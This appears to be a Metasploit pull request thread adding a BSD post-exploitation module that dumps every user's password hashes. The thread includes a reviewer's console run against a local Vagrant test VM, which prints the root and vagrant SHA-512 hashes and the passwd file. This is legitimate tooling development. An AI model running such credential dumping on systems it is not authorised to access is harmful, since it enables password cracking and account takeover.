Add BSD Dump Password Hashes module

[bcoles]

Post module to dump the password hashes for all users on a BSD system.

msf5 label due to using metasploit/framework/hashes/identify.

[wvu]

Hey, I'm a BSD user! @busterb could also take a look. :)

[wvu]

msf5 post(bsd/gather/hashdump) > run

[!] SESSION may not be compatible with this module.
[+] passwd saved in: /Users/wvu/.msf4/loot/20191209205543_default_127.0.0.1_passwd_298544.txt
[+] master.passwd saved in: /Users/wvu/.msf4/loot/20191209205544_default_127.0.0.1_master.passwd_107697.txt
[+] root:$6$2CjsWDv/eiT5JI4t$vRcyt7HjK4DZCX4UNELrefVs8j66jtOEoOzlPbAG2y6NPaAa2Gi/Mm.0YJiAc4Ru6gHdzRqp7AMzDMK7zLLA/1:0:0:Charlie &:/root:/bin/csh
[+] vagrant:$6$7qAYn4E4wZlApNO2$F.vJ7UhMfOhjTUx8LZhOF5BZF34vGjYBcLtwJIMGOA00.8Tumyoaf56C3Ol5rRaA53XHJzTWEmsfPJhcWZW90.:1001:1001:Vagrant User:/home/vagrant:/bin/csh
[+] Unshadowed Password File: /Users/wvu/.msf4/loot/20191209205544_default_127.0.0.1_bsd.hashes_926999.txt
[*] Post module execution completed
msf5 post(bsd/gather/hashdump) > cat /Users/wvu/.msf4/loot/20191209205543_default_127.0.0.1_passwd_298544.txt
[*] exec: cat /Users/wvu/.msf4/loot/20191209205543_default_127.0.0.1_passwd_298544.txt

# $FreeBSD: releng/12.1/etc/master.passwd 337882 2018-08-15 23:18:34Z brd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
ntpd:*:123:123:NTP Daemon:/var/db/ntp:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
vagrant:*:1001:1001:Vagrant User:/home/vagrant:/bin/csh
msf5 post(bsd/gather/hashdump) > cat /Users/wvu/.msf4/loot/20191209205544_default_127.0.0.1_bsd.hashes_926999.txt
[*] exec: cat /Users/wvu/.msf4/loot/20191209205544_default_127.0.0.1_bsd.hashes_926999.txt

root:$6$2CjsWDv/eiT5JI4t$vRcyt7HjK4DZCX4UNELrefVs8j66jtOEoOzlPbAG2y6NPaAa2Gi/Mm.0YJiAc4Ru6gHdzRqp7AMzDMK7zLLA/1:0:0:Charlie &:/root:/bin/csh
vagrant:$6$7qAYn4E4wZlApNO2$F.vJ7UhMfOhjTUx8LZhOF5BZF34vGjYBcLtwJIMGOA00.8Tumyoaf56C3Ol5rRaA53XHJzTWEmsfPJhcWZW90.:1001:1001:Vagrant User:/home/vagrant:/bin/csh
msf5 post(bsd/gather/hashdump) >

[wvu]

Release Notes

This adds the post/bsd/gather/hashdump module to dump the password hashes for all users on a BSD system.